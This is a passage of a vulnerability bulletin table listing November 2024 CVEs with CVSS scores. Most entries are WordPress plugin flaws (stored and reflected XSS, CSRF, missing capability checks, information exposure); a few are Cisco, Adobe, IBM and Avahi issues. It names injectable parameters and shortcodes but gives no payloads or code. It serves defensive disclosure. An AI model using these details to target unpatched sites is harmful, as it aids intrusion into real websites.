The RecipePress Reloaded plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Recipe Ingredients in all versions up to, and including, 2.12.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-11-21 | 6.4 | CVE-2024-11414 |
| n/a -- n/a |
The Slick Sitemap plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'slick-sitemap' shortcode in all versions up to, and including, 2.0.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-11-21 | 6.4 | CVE-2024-11424 |
| n/a -- n/a |
The AutoListicle: Automatically Update Numbered List Articles plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'auto-list-number' shortcode in all versions up to, and including, 1.2.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-11-23 | 6.4 | CVE-2024-11426 |
| n/a -- n/a |
The Lazy load videos and sticky control plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'lazy-load-videos-and-sticky-control' shortcode in all versions up to, and including, 3.0.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-11-21 | 6.4 | CVE-2024-11428 |
| n/a -- n/a |
The SuevaFree Essential Kit plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'counter' shortcode in all versions up to, and including, 1.1.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-11-21 | 6.4 | CVE-2024-11432 |
| n/a -- n/a |
The StreamWeasels Online Status Bar plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'sw-status-bar' shortcode in all versions up to, and including, 2.1.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-11-21 | 6.4 | CVE-2024-11438 |
| n/a -- n/a |
The Grey Owl Lightbox plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'gol_button' shortcode in all versions up to, and including, 1.6.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-11-21 | 6.4 | CVE-2024-11440 |
| n/a -- n/a |
The Include Mastodon Feed plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'include-mastodon-feed' shortcode in all versions up to, and including, 1.9.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-11-21 | 6.4 | CVE-2024-11455 |
| n/a -- n/a |
The Product Designer plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.0.35 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file. | 2024-11-21 | 6.4 | CVE-2024-9111 |
| n/a -- n/a |
A vulnerability in the web-based management interface of Cisco Data Center Network Manager (DCNM) could allow an authenticated, remote attacker to view, modify, and delete data without proper authorization. The vulnerability is due to a failure to limit access to resources that are intended for users with Administrator privileges. An attacker could exploit this vulnerability by convincing a user to click a malicious URL. A successful exploit could allow a low-privileged attacker to list, view, create, edit, and delete templates in the same manner as a user with Administrator privileges.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. | 2024-11-18 | 6.3 | CVE-2020-3539 |
| n/a -- n/a |
A vulnerability in the web-based management interface of Cisco Small Business RV042 Dual WAN VPN Routers and Cisco Small Business RV042G Dual Gigabit WAN VPN Routers could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the web-based management interface of an affected device. The vulnerability is due to insufficient validation of user-supplied input by the web-based management interface of the affected software. An attacker could exploit this vulnerability by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive browser-based information.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. | 2024-11-18 | 6.1 | CVE-2020-3431 |
| n/a -- n/a |
A vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct cross-site scripting (XSS) attacks against a user of the interface. This vulnerability is due to insufficient validation of user-supplied input by the web services interface of an affected device. An attacker could exploit this vulnerability by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or allow the attacker to access sensitive, browser-based information.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.This advisory is part of the October 2021 release of the Cisco ASA, FTD, and FMC Security Advisory Bundled publication. For a complete list of the advisories and links to them, see . | 2024-11-18 | 6.1 | CVE-2021-1444 |
| n/a -- n/a |
The Wishlist for WooCommerce: Multi Wishlists Per Customer PRO plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'wtab' parameter in versions 3.0.8 to 3.1.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. Note: Only WordPress installations with versions of PHP <=7.4 are affected by this vulnerability. | 2024-11-23 | 6.1 | CVE-2024-10519 |
| n/a -- n/a |
The Co-marquage service-public.fr plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 0.5.76. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2024-11-21 | 6.1 | CVE-2024-10522 |
| n/a -- n/a |
The ForumEngine theme for WordPress is vulnerable to Reflected Cross-Site Scripting via a URL in all versions up to, and including, 1.8 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2024-11-21 | 6.1 | CVE-2024-10623 |
| n/a -- n/a |
The affiliate-toolkit plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via a URL in all versions up to, and including, 3.6.7 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2024-11-21 | 6.1 | CVE-2024-10675 |
| n/a -- n/a |
The Announcement & Notification Banner - Bulletin plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg and remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 3.11.7. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2024-11-21 | 6.1 | CVE-2024-10682 |
| n/a -- n/a |
The Friendly Functions for Welcart plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.2.4. This is due to missing or incorrect nonce validation on the settings update functionality. This makes it possible for unauthenticated attackers to inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2024-11-21 | 6.1 | CVE-2024-10726 |
| n/a -- n/a |
The Easiest Funnel Builder For WordPress & WooCommerce by WPFunnels plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'post_id' parameter in all versions up to, and including, 3.5.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. This was partially patched in 3.5.4 and fully patched in 3.5.5. | 2024-11-21 | 6.1 | CVE-2024-10792 |
| n/a -- n/a |
The WordPress Brute Force Protection - Stop Brute Force Attacks plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg & remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.2.6. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2024-11-23 | 6.1 | CVE-2024-10869 |
| n/a -- n/a |
The JobBoardWP - Job Board Listings and Submissions plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg & remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.3.0. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2024-11-23 | 6.1 | CVE-2024-10880 |
| n/a -- n/a |
The WPAdverts - Classifieds Plugin plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg & remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.1.7. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2024-11-21 | 6.1 | CVE-2024-10890 |
| n/a -- n/a |
The Formidable Forms - Contact Form Plugin, Survey, Quiz, Payment, Calculator Form & Custom Form Builder plugin for WordPress is vulnerable to POST-Based Reflected Cross-Site Scripting via the Custom HTML Form parameters in all versions up to, and including, 6.16.1.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2024-11-23 | 6.1 | CVE-2024-11188 |
| n/a -- n/a |
The Premium Packages - Sell Digital Products Securely plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 5.9.3. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2024-11-22 | 6.1 | CVE-2024-11225 |
| n/a -- n/a |
The 404 Solution plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via URLs in all versions up to, and including, 2.35.19 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2024-11-20 | 6.1 | CVE-2024-11277 |
| n/a -- n/a |
The GD bbPress Attachments plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 4.7.2. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2024-11-20 | 6.1 | CVE-2024-11278 |
| n/a -- n/a |
The Custom CSS, JS & PHP plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg & remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.3.0. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2024-11-23 | 6.1 | CVE-2024-11330 |
| n/a -- n/a |
The Page Parts plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.4.3. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2024-11-21 | 6.1 | CVE-2024-11360 |
| n/a -- n/a |
The PDF Invoices & Packing Slips Generator for WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.2.1. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2024-11-23 | 6.1 | CVE-2024-11361 |
| n/a -- n/a |
The Payments Plugin and Checkout Plugin for WooCommerce: Stripe, PayPal, Square, Authorize.net plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.112.0. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2024-11-23 | 6.1 | CVE-2024-11362 |
| n/a -- n/a |
The Crypto and DeFi Widgets - Web3 Cryptocurrency Shortcodes plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.1.6. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2024-11-21 | 6.1 | CVE-2024-11365 |
| n/a -- n/a |
The Subaccounts for WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.6.0. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2024-11-21 | 6.1 | CVE-2024-11370 |
| n/a -- n/a |
The Theater for WordPress plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 0.18.6.2. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2024-11-21 | 6.1 | CVE-2024-11371 |
| n/a -- n/a |
The WIP Incoming Lite plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1.1. This is due to missing or incorrect nonce validation on the save_option() function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2024-11-21 | 6.1 | CVE-2024-11416 |
| n/a -- n/a |
The salavat counter Plugin plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'page' parameter in all versions up to, and including, 0.9.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2024-11-21 | 6.1 | CVE-2024-11435 |
| n/a -- n/a |
The Chessgame Shizzle plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'cs_nonce' parameter in all versions up to, and including, 1.3.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2024-11-23 | 6.1 | CVE-2024-11446 |
| n/a -- n/a |
The Community by PeepSo - Download from PeepSo.com plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'filter' parameter in all versions up to, and including, 6.4.6.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2024-11-21 | 6.1 | CVE-2024-11447 |
| n/a -- n/a |
The Run Contests, Raffles, and Giveaways with ContestsWP plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.0.3. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2024-11-21 | 6.1 | CVE-2024-11456 |
| n/a -- n/a |
The DeBounce Email Validator plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'from', 'to', and 'key' parameters in all versions up to, and including, 5.6.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2024-11-23 | 6.1 | CVE-2024-11463 |
| n/a -- n/a |
The MailChimp Forms by MailMunch plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 3.2.3. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2024-11-20 | 6.1 | CVE-2024-8726 |
| n/a -- n/a |
The MailMunch - Grow your Email List plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 3.1.8. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2024-11-22 | 6.1 | CVE-2024-8735 |
| n/a -- n/a |
The Booster for WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg & remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 7.2.3. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2024-11-20 | 6.1 | CVE-2024-9239 |
| n/a -- n/a |
The Branda - White Label & Branding, Custom Login Page Customizer plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 3.4.19. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2024-11-21 | 6.1 | CVE-2024-9371 |
| n/a -- n/a |
The Checkout with Cash App on WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the '_wp_http_referer' parameter in several files in all versions up to, and including, 6.0.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2024-11-23 | 6.1 | CVE-2024-9635 |
| n/a -- n/a |
The Restaurant Menu - Food Ordering System - Table Reservation plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'action' parameter in all versions up to, and including, 2.4.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2024-11-20 | 6.1 | CVE-2024-9653 |
| n/a -- n/a |
The Ashe theme for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.243. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2024-11-19 | 6.1 | CVE-2024-9777 |
| n/a -- n/a |
A low privileged remote attacker may gain access to forbidden diagnostic data due to incorrect permission assignment for critical resources. | 2024-11-18 | 5.7 | CVE-2024-41970 |
| n/a -- n/a |
The Gallery Blocks with Lightbox. Image Gallery, (HTML5 video , YouTube, Vimeo) Video Gallery and Lightbox for native gallery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the gallery link text parameter in all versions up to, and including, 3.2.4.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Editor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-11-22 | 5.5 | CVE-2024-10034 |
| n/a -- n/a |
The SVG Block plugin for WordPress is vulnerable to Stored Cross-Site Scripting via REST API SVG File uploads in all versions up to, and including, 1.1.24 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Administrator-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file. | 2024-11-19 | 5.5 | CVE-2024-11098 |
| n/a -- n/a |
Unrestricted Upload of File with Dangerous Type, Improper Input Validation, Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) vulnerability in django CMS Association django Filer allows Input Data Manipulation, Stored XSS.This issue affects django Filer: from 3 before 3.3. | 2024-11-20 | 5.5 | CVE-2024-11404 |
| n/a -- n/a |
InDesign Desktop versions 19.0, 20.0 and earlier are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2024-11-21 | 5.5 | CVE-2024-49529 |
| n/a -- n/a |
Substance3D - Stager versions 3.0.2 and earlier are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2024-11-22 | 5.5 | CVE-2024-52998 |
| n/a -- n/a |
A vulnerability in the web-based interface of Cisco Webex Teams could allow an authenticated, remote attacker to conduct cross-site scripting attacks. The vulnerability is due to improper validation of usernames. An attacker could exploit this vulnerability by creating an account that contains malicious HTML or script content and joining a space using the malicious account name. A successful exploit could allow the attacker to conduct cross-site scripting attacks and potentially gain access to sensitive browser-based information.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. | 2024-11-18 | 5.4 | CVE-2020-26067 |
| n/a -- n/a |
The Yaad Sarig Payment Gateway For WC plugin for WordPress is vulnerable to unauthorized modification & access of data due to a missing capability check on the yaadpay_view_log_callback() and yaadpay_delete_log_callback() functions in all versions up to, and including, 2.2.4. This makes it possible for authenticated attackers, with Subscriber-level access and above, to view and delete logs. | 2024-11-20 | 5.4 | CVE-2024-10665 |
| n/a -- n/a |
A low privileged remote attacker may modify the docker settings setup of the device, leading to a limited DoS. | 2024-11-18 | 5.4 | CVE-2024-41968 |
| n/a -- n/a |
The Product Table for WooCommerce by CodeAstrology (wooproducttable.com) plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.5.1 via the var_dump_table parameter. This makes it possible for unauthenticated attackers var data. | 2024-11-23 | 5.3 | CVE-2024-10813 |
| n/a -- n/a |
IBM Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) 10.5, 11.1, and 11.5 is vulnerable to a denial of service as the server may crash under certain conditions with a specially crafted query. | 2024-11-23 | 5.3 | CVE-2024-41761 |
| n/a -- n/a |
A flaw was found in Avahi-daemon, which relies on fixed source ports for wide-area DNS queries. This issue simplifies attacks where malicious DNS responses are injected. | 2024-11-21 | 5.3 | CVE-2024-52615 |
| n/a -- n/a |
A flaw was found in the Avahi-daemon, where it initializes DNS transaction IDs randomly only once at startup, incrementing them sequentially after that. This predictable behavior facilitates DNS spoofing attacks, allowing attackers to guess transaction IDs. | 2024-11-21 | 5.3 | CVE-2024-52616 |
| n/a -- n/a |
IBM PowerVM Platform KeyStore (IBM PowerVM Hypervisor FW950.00 through FW950.90, FW1030.00 through FW1030.60 FW1050.00 through FW1050.20, and FW1060.00 through FW1060.10 functionality can be compromised if an attacker gains service access to the HMC. An attacker that gains service access to the HMC can locate and through a series of service procedures decrypt data contained in the Platform KeyStore. | 2024-11-22 | 5.1 | CVE-2024-41781 |
| n/a -- n/a |
A vulnerability in a certain REST API endpoint of Cisco Data Center Network Manager (DCNM) Software could allow an authenticated, remote attacker to perform a path traversal attack on an affected device. The vulnerability is due to insufficient path restriction enforcement. An attacker could exploit this vulnerability by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to overwrite or list arbitrary files on the affected device.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. | 2024-11-18 | 4.6 | CVE-2020-3538 |
| n/a -- n/a |
A vulnerability in the distribution list feature of Cisco Webex Meetings could allow an authenticated, remote attacker to modify a distribution list that belongs to another user of their organization. The vulnerability is due to insufficient authorization enforcement for requests to update distribution lists. An attacker could exploit this vulnerability by sending a crafted request to the Webex Meetings interface to modify an existing distribution list. A successful exploit could allow the attacker to modify a distribution list that belongs to a user other than themselves.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. | 2024-11-18 | 4.3 | CVE-2021-1410 |
| n/a -- n/a |
A vulnerability in the web-based management interface of Cisco AsyncOS Software for Cisco Content Security Management Appliance (SMA) could allow an authenticated, remote attacker to access sensitive information on an affected device. The vulnerability exists because confidential information is being included in HTTP requests that are exchanged between the user and the device. An attacker could exploit this vulnerability by looking at the raw HTTP requests that are sent to the interface. A successful exploit could allow the attacker to obtain some of the passwords that are configured throughout the interface.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. | 2024-11-18 | 4.3 | CVE-2021-1425 |
| n/a -- n/a |
The WP User Manager - User Profile Builder & Membership plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'add_sidebar' and 'remove_sidebar' functions in all versions up to, and including, 2.9.11. This makes it possible for authenticated attackers, with Subscriber-level access and above, to add or remove a Carbon Fields custom sidebar if the Carbon Fields (carbon-fields) plugin is installed. | 2024-11-23 | 4.3 | CVE-2024-10216 |
| n/a -- n/a |
The Stratum - Elementor Widgets plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.4.4 in includes/templates/content-switcher.php. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive private, pending, and draft template data. | 2024-11-21 | 4.3 | CVE-2024-10316 |
| n/a -- n/a |
The The Plus Addons for Elementor - Elementor Addons, Page Templates, Widgets, Mega Menu, WooCommerce plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 6.0.3 via the render function in modules/widgets/tp_carousel_anything.php, modules/widgets/tp_page_scroll.php, and other widgets. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive private, pending, and draft template data. | 2024-11-20 | 4.3 | CVE-2024-10365 |
| n/a -- n/a |
The Ultimate Member - User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin plugin for WordPress is vulnerable to unauthorized profile picture updates due to a missing capability check on the wp_ajax_um_resize_image() and ajax_resize_image() functions in all versions up to, and including, 2.8.9. This makes it possible for authenticated attackers, with subscriber-level access and above, to update the profile pictures of other users. | 2024-11-21 | 4.3 | CVE-2024-10528 |
| n/a -- n/a |
The Bard Extra plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the bardxtra_import_xml() function in all versions up to, and including, 1.2.7. This makes it possible for authenticated attackers, with subscriber-level access and above, to import demo data. | 2024-11-21 | 4.3 | CVE-2024-10532 |
| n/a -- n/a |
The WP User Manager - User Profile Builder & Membership plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the validate_user_meta_key() function in all versions up to, and including, 2.9.11. This makes it possible for authenticated attackers, with Subscriber-level access and above, to enumerate user meta keys. | 2024-11-23 | 4.3 | CVE-2024-10537 |
| n/a -- n/a |
The WP Travel Engine - Tour Booking Plugin - Tour Operator Software plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the wpte_onboard_save_function_callback() function in all versions up to, and including, 6.2.1. This makes it possible for authenticated attackers, with contributor-level access and above, to modify several settings that could have an impact such as lost revenue and page updates. | 2024-11-23 | 4.3 | CVE-2024-10606 |
| n/a -- n/a |
The Easy Twitter Feed - Twitter feeds plugin for WP plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.2.6 via the [etf] shortcode. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from password protected, private, or draft posts that they should not have access to. | 2024-11-22 | 4.3 | CVE-2024-10666 |
| n/a -- n/a |
The Button Block - Get fully customizable & multi-functional buttons plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.1.4 via the [btn_block] shortcode due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from password protected, private, or draft posts that they should not have access to. | 2024-11-21 | 4.3 | CVE-2024-10671 |
| n/a -- n/a |
The UltraAddons - Elementor Addons (Header Footer Builder, Custom Font, Custom CSS,Woo Widget, Menu Builder, Anywhere Elementor Shortcode) plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 1.1.8 via the show_template due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Contributor-level access and above, to expose the contents of draft, private, and pending posts. | 2024-11-21 | 4.3 | CVE-2024-10696 |
| n/a -- n/a |
The Theme Builder For Elementor plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.2.2 via the 'elementor-template' shortcode due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from private or draft posts created by Elementor that they should not have access to. | 2024-11-21 | 4.3 | CVE-2024-10782 |
| n/a -- n/a |
The If-So Dynamic Content Personalization plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.9.2.1 via the 'ifso-show-post' shortcode due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from private or draft posts created via Elementor that they should not have access to. | 2024-11-21 | 4.3 | CVE-2024-10796 |
| n/a -- n/a |
The Enter Addons - Ultimate Template Builder for Elementor plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 2.1.9 via the Advanced Tabs widget due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from private or draft posts created by Elementor that they should not have access to. | 2024-11-23 | 4.3 | CVE-2024-10868 |
| n/a -- n/a |
The Increase Maximum Upload File Size | Increase Execution Time plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 1.1.3. This is due to returning image upload error messages with full path information. This makes it possible for authenticated attackers, with author-level permissions and above, to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website. | 2024-11-23 | 4.3 | CVE-2024-11265 |
| n/a -- n/a |
The My Contador lesr plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the exportar_registros() function in all versions up to, and including, 2.0. This makes it possible for unauthenticated attackers to export user data. | 2024-11-21 | 4.3 | CVE-2024-11334 |
| n/a -- n/a |
The Ultimate YouTube Video & Shorts Player With Vimeo plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the del_ytsingvid() function in all versions up to, and including, 3.3. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete single playlists. | 2024-11-21 | 4.3 | CVE-2024-11354 |
| n/a -- n/a |
The Ultimate YouTube Video & Shorts Player With Vimeo plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the get_setting() function in all versions up to, and including, 3.3. This makes it possible for authenticated attackers, with Subscriber-level access and above, to view settings for playlists. | 2024-11-22 | 4.3 | CVE-2024-11355 |
| n/a -- n/a |
